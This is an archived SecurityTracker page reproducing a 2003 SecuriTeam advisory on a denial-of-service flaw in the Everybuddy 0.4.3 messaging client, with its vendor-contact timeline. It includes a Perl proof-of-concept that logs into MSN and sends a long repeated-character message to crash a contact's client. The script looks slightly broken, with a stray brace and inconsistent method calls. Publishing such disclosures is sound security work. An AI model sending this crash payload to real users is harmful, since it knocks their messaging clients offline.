SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   Everybuddy Vendors:   everybuddy.com
Everybuddy Messaging Client Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1007416
SecurityTracker URL:  http://securitytracker.com/id/1007416
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 5 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.4.3
Description:   A denial of service vulnerability was reported in Everybuddy. A remote user can cause a target user's client to crash.

SecuriTeam reported that a remote user can send a specially crafted long message (of approximately 1540 characters) to a target user to cause the target user's client to crash.

Some demonstration exploit code is provided in the Source Message.

The following notification timeline is provided:

19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory

Impact:   A remote user can cause a target user's Everybuddy client to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.everybuddy.com/en/index.php (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [NEWS] Everybuddy Vulnerable to a DoS Attack (Long Message)


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Get Thawte's New Step-by-Step SSL Guide for MSIIS

In this guide you will find out how to test, purchase, install
and use a Thawte Digital Certificate on your MSIIS web server. 
Throughout, best practices for set-up are highlighted to help you 
ensure efficient ongoing management of your encryption keys and digital 
certificates. Get your copy of this new guide now:
http://ad.doubleclick.net/clk;5903126;8265119;j

- - - - - - - - -



  Everybuddy Vulnerable to a DoS Attack (Long Message)
------------------------------------------------------------------------


SUMMARY

 <http://www.everybuddy.com/en/index.php> Everybuddy has support for AIM, 
ICQ, MSN, Yahoo! and Jabber chat programs, the program contains a security 
vulnerability that allows remote attackers to cause the program to crash 
by sending it an overly long message (instant message).

DETAILS

Vulnerable systems:
 * Everybuddy version 0.4.3

Exploit:
The exploit code will login as a user, wait for someone to talk to him, 
and send him the attack string.

#!/usr/bin/perl

use MSN; # from  <http://www.adamswann.com/library/2002/msn-perl/> 
http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status => \&Status,
    Answer => \&Answer,
    Message => \&Message,
    Join => \&Join }
);


sub Status {
   my ($self, $username, $newstatus) = @_;

   print "Status() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Print the status change info.
   print "${username}'s status changed from " . 
$self->buddystatus($username) . " to $newstatus.\n";

      # Initiate the call.
      $self->call($username);

      # The call may take a few seconds to complete, so we can't
      # immediately send messages. Let's put the message in a
      # FIFO (queue) that is keyed by username.
      push (@{$queue{$username}}, "Glad to see you online!");
   }

}

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print "Message() called with parameters:\n";
   print " " . join(",", @_), "\n";

}

sub Join {
   my ($self, $username) = @_;

   print "Join() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # See if there's anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
}

sub Answer {
   my ($self, $username) = @_;

   print "Answer() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Send a hello message.
   $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);

}

Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor 
replied, but then disappeared again), we are forced to release this 
information, without receiving a proper response from them.

Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory


ADDITIONAL INFORMATION

The information has been provided by  <mailto:noamr@beyondsecurity.com> 
Noam Rathaus and  <mailto:expert@securiteam.com> SecurITeam Experts.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC